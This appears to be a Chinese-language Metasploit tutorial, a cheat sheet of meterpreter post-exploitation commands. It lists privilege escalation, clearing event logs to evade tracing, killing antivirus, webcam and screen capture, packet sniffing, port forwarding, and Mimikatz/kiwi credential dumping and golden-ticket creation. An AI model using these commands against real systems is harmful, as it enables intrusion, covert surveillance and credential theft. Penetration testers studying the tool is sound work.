Metasploit框架(3), meterpreter 常用命令与扩展工具
进入到 meterpreter >
提示符环境下才能执行命令
一, 常用命令
sysinfo # 系统信息
getuid # 当前用户
getprivs # 当前权限
load priv # 加载priv
getsystem # 提权到系统权限
clearev # 清除系统日志, 安全日志, 避免朔源
quit # 关闭 meterpreter, 关闭 session 连接, 退回msf模块控制台
shell # 反弹shell, 进入目标主机的命令行, 退回 meterpreter: exit
pwd # 当前目标主机目录
lpwd # 当前本地主机目录
ps # 查看所有进程
kill # 关闭进程
getpid # 当前meterpreter注入的进程
migrate pid # 把meterpreter迁移到其他进程
screenshot # 屏幕截图
webcam_list # 查看摄像头, `webcam_snap -i 1 -v false` 间隔1秒拍照
background # 后台挂起 meterpreter, 临时退出meterpreter, 不关闭 session, 切换回msf模块控制台. # 在msf控制台输入 sessions 查看所有已打开的session, # 使用 `sessions -i 序号` 命令可以重新进入对应的 meterpreter 控制台.
run # 执行后渗透攻击脚本, 输入两次tab显示所有脚本的提示. 比如:# `run post/windows/manage/killav` 关闭杀毒软件进程# `run vnc` 开启vnc远程连接
upload # 上传文件, `upload /home/3389.ext c:\\Test\\` 将3389.exe上传到目标主机c盘
二, 其他工具:
1. sniffer 流量监听工具
use sniffer # 加载sniffer扩展模块
sniffer_interfaces # 列出网卡
sniffer_start 1 # 选择网卡开始抓包
sniffer_stats 1 # 查看状态
sniffer_dump 1 /tmp/a.pcap # 导出数据包, 可以通过wireshark分析.
sniffer_stop 1 # 停止抓包
2. portfwd 端口转发工具
portfwd list # 端口转发列表
portfwd add -l 1122 -p 2408 -r 127.0.0.1 # 将目标2408端口转发到本地系统1122端口.
3. kiwi (旧版名称: Mimikatz) 获取账户密码工具
注意: kiwi模块同时支持32位和64位的系统,但是该模块默认是加载32位的系统,所以如果目标主机是64位系统的话,直接默认加载该模块会导致很多功能无法使用。
所以如果目标系统是64位的,则必须先查看系统进程列表,然后将meterpreter进程迁移到一个64位程序的进程中,才能加载kiwi并且查看系统明文。
load kiwi # 加载工具
creds_all # 列出所有账户的凭证和明文密码.
password_change # 修改密码
wifi_list # 列出wifi配置
wifi_list_shared # 列出共享wifi配置/编码
golden_ticket_create # 创建黄金票据